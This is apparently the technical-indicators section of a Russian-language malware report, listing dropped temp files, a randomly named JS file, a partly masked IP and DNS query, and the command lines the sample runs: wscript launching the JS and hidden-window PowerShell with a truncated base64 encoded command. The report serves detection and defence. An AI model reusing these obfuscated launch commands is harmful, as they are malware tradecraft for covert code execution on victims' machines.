Техническая информация
- %TEMP%\mz_etilqs_xxssah8y9ppjel8
- %TEMP%\mz_etilqs_0lyhnjg2ociwynn
- %TEMP%\mz_etilqs_ozd51yhszxt3iz9
- %TEMP%\mz_etilqs_p1sv5vuphqmyhun
- %TEMP%\mz_etilqs_tomd3ycipwiue7g
- %ALLUSERSPROFILE%\squintierquatrefoil.js
- %TEMP%\mz_etilqs_cg10hwwitx9c3jq
- '35.##1.9.150':443
- DNS ASK fe########alog-cdn.prod.mozaws.net
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\SquintierQuatrefoil.js" PropitiationImbute Intellectualized tiltupRoisters SalutationlessViragos
- '<SYSTEM32>\wscript.exe' "%ALLUSERSPROFILE%\SquintierQuatrefoil.js" PropitiationImbute Intellectualized tiltupRoisters SalutationlessViragos' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedcommand "JABTAGUAeAB0AG8AbABlAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBZAFEAQgB1AEEASABVAEEAWQBRAEIAeQBBAEgAawBBAFQAdwBCAHoAQQBHAE0AQQBhAFEAQgBzAEEA...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -encodedcommand "JABTAGUAeAB0AG8AbABlAHQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFADAAQQBZAFEAQgB1AEEASABVAEEAWQBRAEIAeQBBAEgAawBBAFQAdwBCAHoAQQBHAE0AQQBhAFEAQgBzAEEA...